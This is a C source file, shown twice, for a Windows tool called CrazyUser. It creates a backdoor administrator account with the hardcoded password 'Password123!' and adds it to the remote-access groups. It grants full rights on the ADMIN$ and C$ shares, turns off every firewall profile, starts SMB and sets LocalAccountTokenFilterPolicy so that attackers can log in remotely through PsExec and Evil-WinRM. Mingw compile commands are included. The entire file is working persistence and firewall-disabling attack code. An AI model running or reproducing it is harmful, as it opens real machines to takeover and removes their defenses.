h4rithd/CrazyUser.c

## CrazyUser.c
/*
 **************************************************************************
 *                                                                        *
 *                 Created by Harith Dilshan (h4rithd.com)                *
 *                                                                        *
 *  Purpose:                                                              *
 *    This script creates a new user on a Windows system, adds the user   *
 *    to the Administrators group, grants PsExec and Evil-WinRM access,   *
 *    disables all firewall rules, enables SMB to allow login via         *
 *    PsExec and Evil-WinRM, grants access to administrative shares, and  *
 *    sets LocalAccountTokenFilterPolicy to allow remote administrative   *
 *    connections with full token.                                        *
 *                                                                        *
 *  Compile for 64-bit:                                                   *
 *    x86_64-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32      *
 *                                                                        *
 *  Compile for 32-bit:                                                   *
 *    i686-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32        *
 *                                                                        *
 *  Credentials:                                                          *
 *    Username: h4rithd                                                   *
 *    Password: Password123!                                              *
 *                                                                        *
 **************************************************************************
 */

#include <windows.h>
#include <lm.h>
#include <stdio.h>

#define BUFFER_SIZE 512
#define USERNAME L"h4rithd"
#define PASSWORD L"Password123!"

void AddUserToAdminGroup(LPWSTR username) {
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = username;

    NET_API_STATUS status = NetLocalGroupAddMembers(
        NULL, L"Administrators", 3, (LPBYTE)&account, 1
    );

    if (status == NERR_Success) {
        wprintf(L"User %s added to Administrators group successfully.\n", username);
    } else {
        wprintf(L"Failed to add user %s to Administrators group. Error: %lu\n", username, status);
    }
}

void GrantPsExecAccess(LPWSTR username) {
    WCHAR command[BUFFER_SIZE];
    swprintf(command, BUFFER_SIZE, L"net localgroup Remote Desktop Users %s /add", username);
    _wsystem(command);

    swprintf(command, BUFFER_SIZE, L"net localgroup Distributed COM Users %s /add", username);
    _wsystem(command);

    swprintf(command, BUFFER_SIZE, L"net localgroup Performance Log Users %s /add", username);
    _wsystem(command);

    swprintf(command, BUFFER_SIZE, L"net share ADMIN$ /GRANT:%s, FULL", username);
    _wsystem(command);

    swprintf(command, BUFFER_SIZE, L"net share C$ /GRANT:%s, FULL", username);
    _wsystem(command);
}

void DisableFirewall() {
    _wsystem(L"netsh advfirewall set allprofiles state off");
}

void EnableSMB() {
    _wsystem(L"sc config lanmanworkstation start= auto");
    _wsystem(L"sc start lanmanworkstation");
    _wsystem(L"sc config lanmanserver start= auto");
    _wsystem(L"sc start lanmanserver");
}

void SetLocalAccountTokenFilterPolicy() {
    _wsystem(L"REG add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f");
}

int main() {
    USER_INFO_1 user_info;
    DWORD level = 1, error = 0, status;

    memset(&user_info, 0, sizeof(user_info));
    user_info.usri1_name = USERNAME;
    user_info.usri1_password = PASSWORD;
    user_info.usri1_priv = USER_PRIV_USER;
    user_info.usri1_comment = L"Created by C program";
    user_info.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;

    status = NetUserAdd(NULL, level, (LPBYTE)&user_info, &error);

    if (status == NERR_Success) {
        wprintf(L"User %s has been successfully added.\n", user_info.usri1_name);
        AddUserToAdminGroup(user_info.usri1_name);
        GrantPsExecAccess(user_info.usri1_name);
        DisableFirewall();
        EnableSMB();
        SetLocalAccountTokenFilterPolicy();
    } else {
        wprintf(L"NetUserAdd failed with error: %lu\n", status);
    }

    return 0;
}
	/*
	**************************************************************************
	* *
	* Created by Harith Dilshan (h4rithd.com) *
	* *
	* Purpose: *
	* This script creates a new user on a Windows system, adds the user *
	* to the Administrators group, grants PsExec and Evil-WinRM access, *
	* disables all firewall rules, enables SMB to allow login via *
	* PsExec and Evil-WinRM, grants access to administrative shares, and *
	* sets LocalAccountTokenFilterPolicy to allow remote administrative *
	* connections with full token. *
	* *
	* Compile for 64-bit: *
	* x86_64-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
	* *
	* Compile for 32-bit: *
	* i686-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
	* *
	* Credentials: *
	* Username: h4rithd *
	* Password: Password123! *
	* *
	**************************************************************************
	*/

	#include <windows.h>
	#include <lm.h>
	#include <stdio.h>

	#define BUFFER_SIZE 512
	#define USERNAME L"h4rithd"
	#define PASSWORD L"Password123!"

	void AddUserToAdminGroup(LPWSTR username) {
	LOCALGROUP_MEMBERS_INFO_3 account;
	account.lgrmi3_domainandname = username;

	NET_API_STATUS status = NetLocalGroupAddMembers(
	NULL, L"Administrators", 3, (LPBYTE)&account, 1
	);

	if (status == NERR_Success) {
	wprintf(L"User %s added to Administrators group successfully.\n", username);
	} else {
	wprintf(L"Failed to add user %s to Administrators group. Error: %lu\n", username, status);
	}
	}

	void GrantPsExecAccess(LPWSTR username) {
	WCHAR command[BUFFER_SIZE];
	swprintf(command, BUFFER_SIZE, L"net localgroup Remote Desktop Users %s /add", username);
	_wsystem(command);

	swprintf(command, BUFFER_SIZE, L"net localgroup Distributed COM Users %s /add", username);
	_wsystem(command);

	swprintf(command, BUFFER_SIZE, L"net localgroup Performance Log Users %s /add", username);
	_wsystem(command);

	swprintf(command, BUFFER_SIZE, L"net share ADMIN$ /GRANT:%s, FULL", username);
	_wsystem(command);

	swprintf(command, BUFFER_SIZE, L"net share C$ /GRANT:%s, FULL", username);
	_wsystem(command);
	}

	void DisableFirewall() {
	_wsystem(L"netsh advfirewall set allprofiles state off");
	}

	void EnableSMB() {
	_wsystem(L"sc config lanmanworkstation start= auto");
	_wsystem(L"sc start lanmanworkstation");
	_wsystem(L"sc config lanmanserver start= auto");
	_wsystem(L"sc start lanmanserver");
	}

	void SetLocalAccountTokenFilterPolicy() {
	_wsystem(L"REG add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f");
	}

	int main() {
	USER_INFO_1 user_info;
	DWORD level = 1, error = 0, status;

	memset(&user_info, 0, sizeof(user_info));
	user_info.usri1_name = USERNAME;
	user_info.usri1_password = PASSWORD;
	user_info.usri1_priv = USER_PRIV_USER;
	user_info.usri1_comment = L"Created by C program";
	user_info.usri1_flags = UF_SCRIPT \| UF_DONT_EXPIRE_PASSWD;

	status = NetUserAdd(NULL, level, (LPBYTE)&user_info, &error);

	if (status == NERR_Success) {
	wprintf(L"User %s has been successfully added.\n", user_info.usri1_name);
	AddUserToAdminGroup(user_info.usri1_name);
	GrantPsExecAccess(user_info.usri1_name);
	DisableFirewall();
	EnableSMB();
	SetLocalAccountTokenFilterPolicy();
	} else {
	wprintf(L"NetUserAdd failed with error: %lu\n", status);
	}

	return 0;
	}